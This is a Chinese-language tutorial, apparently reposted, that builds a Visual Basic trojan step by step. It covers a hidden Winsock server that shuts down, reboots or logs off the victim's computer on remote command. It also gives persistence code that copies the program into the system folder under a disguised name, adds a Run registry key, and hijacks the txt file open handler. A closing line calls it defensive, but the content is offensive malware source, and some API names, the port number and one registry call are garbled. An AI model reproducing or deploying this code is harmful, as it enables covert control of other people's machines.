首先,新建一工程,名為Server,新建一個窗體,Name為Server,在窗體中加入一個winsock控件,Name設為sckServer,協定設為預設的TCP/ip協定。
接下來我們回來Server窗體模組中,加入如下程式碼:
->PRivateSubform_Load()
WithMe
.sckServer.LocalPort=88917'本地端口(呵呵!我的生日!)
.sckServer.Listen'開始監聽
EndWith
EndSub
'接受客戶端的連線請求。
PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
WithMe
If.sckServer.State<>sckClosedThen.sckServer.Close
.sckServer.Accept(requestID)
EndWith
EndSub->
下面我們來建立客戶端程式:新建一個工程,名為Client,把窗體名為Client,在上面加入一個winsock控件,名為sckClient,協定為TCP/IP協定。再加一個按鈕cmdConnect在窗體模組中加入程式碼:
->PrivateSubform_Load()
WithMe
.sckClient.RemoteHost=127.0.0.1'設定遠端IP,本例設為本機。
.sckClient.RemotePort=88917'遠端埠,就為server中的設定一樣.
EndWith
EndSub
PrivatesubcmdConnect_Click()
SckClient.Connect
Endsub->
至此,點擊Connect按鈕我們的兩個工程已經可以進行通訊了,但看不見,你可以在Client中的sckClient_Connect事件中加入程式碼:debug.printConnetionsuccessful!來查看。
這只是第一步,一點工作也做不了,下面我們來為它們添加功能。為了簡單,本文章只實現一點小小的功能―――關機,重啟,註銷。好,開始吧!
在Server工程中新建一個模組,Name為modApi,這個模快為一些API函數,加入以下API函數:
->PublicDeclareFunctionExitWindowXXXLibuser32AliasExitWindowXXX(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong
PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLibuser32AliasClipCursor(lpRectAsAny)AsLong
PublicTypeRECT
LeftAsLong
TopAsLong
RightAsLong
BottomAsLong
EndType->
注意:在兩個socket中編程中,進行通訊的重要事件是DataArrival事件,用於接收遠端資料。
下面在Client工程的Client窗體中放入三個按鈕,分別為cmdExit,cmdLogoff,cmdReboot。它們用於對遠端的關機,註銷,重啟操作。分別加入如下程式碼:
->PrivateSubcmdExit_Click()
Me.sckClient.SendDataExit
EndSub
PrivateSubcmdLogoff_Click()
Me.sckClient.SendDataLogoff
EndSub
PrivateSubcmdReboot_Click()
Me.sckClient.SendDataReboot
EndSub->
全都是對服務端發出請求。下面到Server工程:在Server中新增sckServer的DataArrial事件,接收客戶端的請求。
->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
DimstrDataAsString
WithMe
'接收客戶要求的訊息
.sckServer.GetDatastrData
SelectCasestrData
CaseExit
'關機
CallExitWindowXXX(EWX_SHUTDOWN,0)
CaseReboot
'重啟
CallExitWindowXXX(EWX_REBOOT,0)
CaseLogoff
'註銷
CallExitWindowXXX(EWX_LOGOFF,0)
EndSelect
EndWith
EndSub->
好了,到此我們已經實現功能了,但還不行,我們要它在背後運行。這簡單,在Server中的form_Load事件中加入一句:me.hide。好這下看不見了,但大家知道木馬是一開機就自動運轉了,這又是為什麼,怎麼實現的?把它加入到註冊表的啟動組?對,不錯,跟我來吧!
回到Server工程中的modApi中加入如下API函數:
->PublicDeclareFunctionRegOpenKeyLibadvapi32.dllAliasRegOpenKeyA(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicDeclareFunctionRegSetvalueExLibadvapi32.dllAliasRegSetvalueExA(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLongDataAsLong)AsLong
PublicDeclareFunctionRegCreateKeyLibadvapi32.dllAliasRegCreateKeyA(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicConstREG_BINARY=3
PublicConstREG_SZ=1
PublicConstHKEY_LOCAL_MACHINE=&H80000002
PublicConstHKEY_CLASSES_ROOT=&H80000000->
寫到註冊表啟動群組中的過程。
->PublicSubStartupGroup()
DimsKeyAsString
DimresultAsLong
DimhKeyIDAsLong
DimsKeyValAsString
sKey=Systrsy'啟動組中的鍵,找一個與系統檔案相近的。
sKeyVal=C:/windows/system/systrsy.exe'木馬檔案的路徑,可以用GetSystemDirectory來取得系統路徑。
result=RegOpenKey(HKEY_LOCAL_MACHINE,_
Software/Microsoft/Windows/CurrentVersion/Run,hKeyID)
Ifresult=0Then
result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
EndIf
EndSub->
好,就這樣簡單地完成了。但是,想過沒有,如果不是很菜的鳥,到註冊表中見一刪,我們苦苦的心血不就白白地浪費了嗎?不行,還得想讓他發現了刪也刪不掉。請看下面的程式碼:
->PublicSubWriteToTxt()
DimresultAsLong
DimhKeyIDAsLong
DimskeyAsString
DimskeyValAsString
skey=txtfile/shell/open/command
skeyVal=C:/windows/system/txtView.exe
result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)
Ifresult=0Then
result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
EndIf
EndSub->
肯定不少朋友一看就知道了,原來是與txt檔案進行關聯,一點也不錯,但C:/windows/system/txtView.exe是哪裡來的,我們的木馬是C:/windows/system/systrsy .exe呀。這可是我們木馬的分身了。
好,回到Server工程的Server窗體的form_Load中,加入如下程式碼:
->DimsCurrentPathAsString,sSystemDirAsString
sCurrentPath=App.Path&/&App.EXEName&.exe
sSystemDir=C:/windows/system
OnErrorResumeNext
'複製檔案成系統目錄下的Systrsy.exe
FileCopysCurrentPath,sSystemDir&/Systrsy.exe
OnErrorResumeNext
複製檔案成系統目錄下的txtView.exe
FileCopysCurrentPath,sSystemDir&/txtView.exe->
呼叫
->CallstartupGroup
CallWriteToTxt
'判斷程式是否下在執行
IfApp.PrevInstanceThen
'如果已經運行就退出。
End
EndIf->
注意:
1.大家在處理端口是最好使用高階端口,否則會和一些常用端口發生衝突
2.在第一次使用VB.NET的最好看看有關的圖書
->
以上就是如何利用VisualBasic防範木馬類攻擊,希望大家知己知彼,防範於未然!